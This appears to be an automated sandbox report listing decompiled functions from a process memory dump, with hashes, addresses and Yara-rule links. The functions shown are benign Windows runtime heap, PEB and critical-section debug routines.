                                                        Function 0489F358, Relevance: .0, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E0489F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E048CF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L048B4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                        0x0489f35d
                                                        0x0489f361
                                                        0x0489f367
                                                        0x0489f372
                                                        0x0489f38c
                                                        0x0489f38c
                                                        0x0489f394

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                        • Instruction ID: 0ad7903544f2598c1a928e0fcfe8ba5238cc670d969b6f81345356a285f5162b
                                                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                        • Instruction Fuzzy Hash: 1BE0D832A40118BFEB319ADD9D05F9ABBADDB44B60F040655BB04D7150D574AD00D6D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048AFF60, Relevance: .0, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048AFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x48711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E049688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E048B0050(_t14);
				}
			}










                                                        0x048aff66
                                                        0x048aff6b
                                                        0x00000000
                                                        0x048aff8f
                                                        0x00000000
                                                        0x048aff8f

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3f11e0c6ab94f7adf3af99f3aa7c9b67b68860a293a3ad8c0370488d4ffcde58
                                                        • Instruction ID: 9325c9d05802318cbf3a0ffc57b6705e31874d7e7770e298d77a5bfd7fd16db2
                                                        • Opcode Fuzzy Hash: 3f11e0c6ab94f7adf3af99f3aa7c9b67b68860a293a3ad8c0370488d4ffcde58
                                                        • Instruction Fuzzy Hash: A9E0DFB0205A049FF734EB55D0D0F2637989B42769F198E2DEB08CB601CEA1F891C256
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049241E8, Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 82%
                                                        			E049241E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x49708f0);
				_t5 = E048ED08C(__ebx, __edi, __esi);
				if( *0x49887ec == 0) {
					E048AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x49887ec == 0) {
						 *0x49887f0 = 0x49887ec;
						 *0x49887ec = 0x49887ec;
						 *0x49887e8 = 0x49887e4;
						 *0x49887e4 = 0x49887e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04924248();
				}
				return E048ED0D1(_t5);
			}





                                                        0x049241e8
                                                        0x049241ea
                                                        0x049241ef
                                                        0x049241fb
                                                        0x04924206
                                                        0x0492420b
                                                        0x04924216
                                                        0x0492421d
                                                        0x04924222
                                                        0x0492422c
                                                        0x04924231
                                                        0x04924231
                                                        0x04924236
                                                        0x0492423d
                                                        0x0492423d
                                                        0x04924247

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea0cc9b5b7a188da57f1da504885b816bc5ac928a191325ae50a51eefb6c17c9
                                                        • Instruction ID: 97943e36c6129d652d0e7f99c326ad51d68e2357f7469b9960e5b852859550ab
                                                        • Opcode Fuzzy Hash: ea0cc9b5b7a188da57f1da504885b816bc5ac928a191325ae50a51eefb6c17c9
                                                        • Instruction Fuzzy Hash: E8F0F8748547008FEBA0FF6F95007143AF4E7C4A14F80453DC00086A88C7B8A844CF21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0494D380, Relevance: .0, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0494D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L0489E8B0(__ecx, _a4, 0xfff);
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                        0x0494d38a
                                                        0x0494d39b
                                                        0x0494d3b1
                                                        0x00000000
                                                        0x0494d3b6
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                        • Instruction ID: a1a56b88ed69e14e6b2118776b98f586678585f85ed4b5e13f2a0d7de00771b7
                                                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                        • Instruction Fuzzy Hash: 42E0CD35240648FBEF215E44CC00F757B56DB80794F104531FD049A790C675BC51E6C4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048CA185, Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048CA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x49867e4 >= 0xa) {
					if(_t5 < 0x4986800 || _t5 >= 0x4986900) {
						return L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E048B0010(0x49867e0, _t5);
				}
			}





                                                        0x048ca190
                                                        0x048ca1a6
                                                        0x048ca1c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048ca192
                                                        0x048ca192
                                                        0x048ca19f
                                                        0x048ca19f

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f124f77c4dd3f3db772b2fb25b9ffd382e8a5426bd6b4245b94d9994aa288397
                                                        • Instruction ID: 663c5899b7142786e6f650021d5417de0f4e013234765dd748fc7ea58f7d53bd
                                                        • Opcode Fuzzy Hash: f124f77c4dd3f3db772b2fb25b9ffd382e8a5426bd6b4245b94d9994aa288397
                                                        • Instruction Fuzzy Hash: 36D02B621202085EF71C371CA814B223252E7C0B18F304E2EF147DE690DAB0FCD0818E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C16E0, Relevance: .0, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048C16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E048C1710(0x49867e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L048B4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                        0x048c16e8
                                                        0x048c16ef
                                                        0x048c16f3
                                                        0x048c16fe
                                                        0x00000000
                                                        0x048c1700
                                                        0x048c170d
                                                        0x048c170d
                                                        0x048c16f2
                                                        0x048c16f2
                                                        0x048c16f2
                                                        0x048c16f2

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31a2c9bff36271c9ad7ec4b3a1e70f60a5c981d678230d59a09b5a6fa31bb621
                                                        • Instruction ID: bb08e6a9ba84f552b64a842392bad888010a8099c4a98219263036f8c910c29f
                                                        • Opcode Fuzzy Hash: 31a2c9bff36271c9ad7ec4b3a1e70f60a5c981d678230d59a09b5a6fa31bb621
                                                        • Instruction Fuzzy Hash: 49D0A73115020056FA2D5B18988CF143251DBC0B89F38096CF10BD94C2CFF0FC92E888
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 049153CA, Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E049153CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E048AEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                        0x049153ca
                                                        0x049153ce
                                                        0x049153d9
                                                        0x049153de
                                                        0x049153e1
                                                        0x049153e1
                                                        0x049153e6
                                                        0x049153f3
                                                        0x00000000
                                                        0x049153f8
                                                        0x049153fb

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                        • Instruction ID: c789115d749301104a29e3585a88ec6f6528a5fb02e5342380593036f6dac7fc
                                                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                        • Instruction Fuzzy Hash: 14E08C31940788EFDF12DB48CA90F5EB7F9FB84B00F160814A408AF630C6A4BC01CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C35A1, Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048C35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E048AEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                        0x048c35a1
                                                        0x048c35a1
                                                        0x048c35a5
                                                        0x048c35ab
                                                        0x048c35ab
                                                        0x048c35b5
                                                        0x00000000
                                                        0x048c35c1
                                                        0x048c35b7

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                        • Instruction ID: 7cf9949ec706b0969887d9b1e37cfd97b42507ced7a97162bc3d8c3e369db43a
                                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                        • Instruction Fuzzy Hash: 1DD0A931542184BEEB01AF14C22876833B2BB0030CF58AE6D880286852C3BAEA1FD602
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048AAAB0, Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048AAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                        0x048aaab6
                                                        0x048aaabb
                                                        0x048fa442
                                                        0x00000000
                                                        0x048fa448
                                                        0x048fa454
                                                        0x048fa454
                                                        0x048aaac1
                                                        0x048aaac1
                                                        0x048aaac6
                                                        0x048aaac6

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                        • Instruction ID: f75e080ad03a14bf29fd95bd90c026a032d086d404dc06a63a05e8538ada2ed5
                                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                        • Instruction Fuzzy Hash: 2DD0E939352A80CFD71ACF5DC954B1573A4BB44B44FC50990E505CBB61E66CED94CA10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0491A537, Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0491A537(intOrPtr _a4, intOrPtr _a8) {

				return L048B8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                        0x0491a553

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                        • Instruction ID: ae29d50679da7fa61b358f3afb19a39716e1e78c292b3ff939b7abe761eca36c
                                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                        • Instruction Fuzzy Hash: 20C01232080248BBCB127E85CC01F467B2AEB94B60F008410BA480A6608672E970EA84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489DB40, Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0489DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L048B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                        0x0489db4d
                                                        0x0489db54
                                                        0x0489db5f
                                                        0x0489db56
                                                        0x0489db56
                                                        0x0489db5c
                                                        0x0489db5c

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                        • Instruction ID: aae6b65679aa172b5bfc5574886701b90d8a220c65838db6234defad15584214
                                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                        • Instruction Fuzzy Hash: F0C08C30290A00AEFB221F20CD02B4036E0BB01F05F4809A06300DA0F0DBB8EC01EA00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489AD30, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0489AD30(intOrPtr _a4) {

				return L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                        0x0489ad49

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                        • Instruction ID: f7eb1399665251047172bbd0846e312ebd4ec47edb60a49f1ea9c4381b42a6b2
                                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                        • Instruction Fuzzy Hash: 2AC08C32080288BBC7126A49CD00F017B29E790B60F000020BA044A6618A72E860D588
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C36CC, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048C36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L048B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                        0x048c36d2
                                                        0x048c36e8
                                                        0x048c36d4
                                                        0x048c36e5
                                                        0x048c36e5

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                        • Instruction ID: ac056e36002f03d4ee28e734a26930f03fc78b63dcc473fc28f819c5f472d463
                                                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                        • Instruction Fuzzy Hash: 4BC08C70150440AAEA151F208D01F187254A700A21F640B587220895E0D568AC00E500
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A76E2, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048A76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                        0x048a76e4
                                                        0x00000000
                                                        0x048a76f8
                                                        0x048a76fd

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                        • Instruction ID: f50955d7669fe5a60f2d987aec8d569edb1fb10f358bdb0460a33e5bb27808da
                                                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                        • Instruction Fuzzy Hash: CCC08C701412C45EFB2A6B08CE20B203650AB08708F4C0B9CAA418D5A1C3E8F822D208
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048B3A1C, Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048B3A1C(intOrPtr _a4) {
				void* _t5;

				return L048B4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                        0x048b3a35

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                        • Instruction ID: c96a359ba6f0f214c5af84ceb1f33bccee41d1f3e16249ca7ab90d1847a626d7
                                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                        • Instruction Fuzzy Hash: 5CC08C32080248BBD7126E45DC01F057B29E790B60F000020B6040A6618572EC60D988
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048B7D50, Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048B7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                        0x048b7d56
                                                        0x048b7d5b
                                                        0x048b7d60
                                                        0x048b7d5d
                                                        0x048b7d5d
                                                        0x048b7d5d

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                        • Instruction ID: a84ca81c8eef980cb9c26ca03aebb9da8fd75d02d9133e81ec00be10aafd213d
                                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                        • Instruction Fuzzy Hash: BFB09234302A808FCF16DF18C080B5533E4BB84A80B8804D4E400CBA20D229F8008900
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048C2ACB, Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E048C2ACB() {
				void* _t5;

				return E048AEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                        0x048c2adc

                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                        • Instruction ID: 5850c65e2de39e758ddcac77c6ca68c94d4a91b9bb663d472d5628ec4a448886
                                                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                        • Instruction Fuzzy Hash: 6FB01232C51440CFDF02EF44C660B297331FB00750F054C90900177930C268BC12CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0492FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 53%
                                                        			E0492FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E048DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04925720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04925720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                        0x0492fdda
                                                        0x0492fde2
                                                        0x0492fde5
                                                        0x0492fdec
                                                        0x0492fdfa
                                                        0x0492fdff
                                                        0x0492fe0a
                                                        0x0492fe0f
                                                        0x0492fe17
                                                        0x0492fe1e
                                                        0x0492fe19
                                                        0x0492fe19
                                                        0x0492fe19
                                                        0x0492fe20
                                                        0x0492fe21
                                                        0x0492fe22
                                                        0x0492fe25
                                                        0x0492fe40

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0492FDFA
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0492FE2B
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0492FE01
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                        • API String ID: 885266447-3903918235
                                                        • Opcode ID: b34f68b2691df2ffd3c2ee37d00d3d528087c46e7e425fdff187795bd8c60a89
                                                        • Instruction ID: 49791bad4dc14c2bbe8992b5ec3c821c6a2d9b688875f4782a64b3da20b8141b
                                                        • Opcode Fuzzy Hash: b34f68b2691df2ffd3c2ee37d00d3d528087c46e7e425fdff187795bd8c60a89
                                                        • Instruction Fuzzy Hash: 8CF0F672640211BFEA212A45DD06F33BB6EEB84730F150724F628965D5EAA2FC20D7F4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%